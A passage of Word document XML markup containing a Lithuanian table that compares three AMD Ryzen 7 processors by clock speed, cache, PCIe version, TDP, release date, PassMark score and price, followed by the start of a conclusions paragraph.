              <w:t>8/16</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="2F994B70" w14:textId="77777777" w:rsidTr="00226B45">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2475" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="67C96381" w14:textId="19EBEF1D" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Taktinis dažnis (Turbo Boost)GHz</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2477" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="059C3021" w14:textId="7B534B7A" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>3.9GHz/ 4.5GHz</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2479" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="401A9C9B" w14:textId="25E5AB18" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>3.8GHz/ 4.7GHz</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2485" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="22B252B0" w14:textId="652F6D55" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>3.7GHz/ 4.3GHz</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="0BEFDC14" w14:textId="77777777" w:rsidTr="00226B45">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2475" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="31D362C2" w14:textId="17B20787" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Atminties cache [L3] talpa</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2477" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4C23AD8F" w14:textId="6A74D40F" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>32MB</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2479" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="25076A5A" w14:textId="3F8F4687" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>32 MB</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2485" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="36FD76B4" w14:textId="678237CF" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>16 MB</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="2B5BDA1F" w14:textId="77777777" w:rsidTr="00226B45">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2475" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="173CCCE0" w14:textId="6FAACDB0" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Valdiklis PCI Express 3.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2477" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="095CB64F" w14:textId="35129041" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>PCIe 4.0 x16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2479" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2092A7B2" w14:textId="5BF374B6" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>PCIe 4.0 x16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2485" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="181FFF7F" w14:textId="09A3E98D" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>PCIe 3.0 x16</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="306CD622" w14:textId="77777777" w:rsidTr="00226B45">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2475" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="0051CCDE" w14:textId="68C05E83" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Atminties valdiklis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2477" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6D36BF10" w14:textId="37A5CEAA" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>procesoriuje</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2479" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0F9D9CA3" w14:textId="0B6390A8" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>procesoriuje</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2485" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3D1C6B6C" w14:textId="70438888" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>procesoriuje</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="3F7CCE49" w14:textId="77777777" w:rsidTr="00226B45">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2475" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="7FDEA479" w14:textId="6AECC02D" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>TPD lygis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2477" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1D3F5118" w14:textId="1003B667" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>105W</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2479" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="77B3E094" w14:textId="0BF08C5F" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>105W</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2485" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="65D5ABB9" w14:textId="69D9C017" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>105W</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="0C0C7207" w14:textId="77777777" w:rsidTr="00226B45">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2475" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="2DB440D0" w14:textId="107CA7AB" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Išleidimo metai į rinką</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2477" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="663FC654" w14:textId="4A08AB28" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Q2'19</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2479" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2DF701C6" w14:textId="462CB879" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Q2'20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2485" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4095AA48" w14:textId="61AB27C4" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Q2'18</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="522C94C3" w14:textId="77777777" w:rsidTr="00226B45">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2475" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="4A31D4F2" w14:textId="5D77EFE0" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Našumo taškų skaičius passmark</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2477" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6924DEB8" w14:textId="0D39C523" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>23964</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2479" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4B555185" w14:textId="681129BC" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>28685</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2485" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="060DFA45" w14:textId="7E217C3E" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>17614</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="1017179D" w14:textId="77777777" w:rsidTr="00226B45">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2475" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="6A85E17C" w14:textId="1F64C153" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Kaina</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2477" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="555A9FBB" w14:textId="3F580E84" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>$370.00 - $406.00</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2479" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1A831F7F" w14:textId="76E1851E" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>$449.99</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2485" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="43C12BC5" w14:textId="3FF55659" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>$283</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="303CDAAE" w14:textId="77777777" w:rsidR="00924E65" w:rsidRPr="005A5C28" w:rsidRDefault="00924E65" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E052079" w14:textId="70BAB778" w:rsidR="00B0488D" w:rsidRPr="005A5C28" w:rsidRDefault="1EA8E69B" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Išvados.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Visų trijų procesorių dažniai paspartintam režime skiriasi</w:t>
      </w:r>
      <w:r w:rsidR="00F42309" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>AMD RYZEN 7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20965A34" w14:textId="16F741EF" w:rsidR="00B0488D" w:rsidRPr="005A5C28" w:rsidRDefault="1EA8E69B" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">3800XT </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ir</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> AMD RYZEN 7 5800XT skiriasi </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">200 MHz, o seniausias </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>AMD RYZEN 7</w:t>
      </w:r>
      <w:r w:rsidR="63A2E068" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">2700X </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">ir naujausias </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">AMD RYZEN 7 5800XT </w:t>
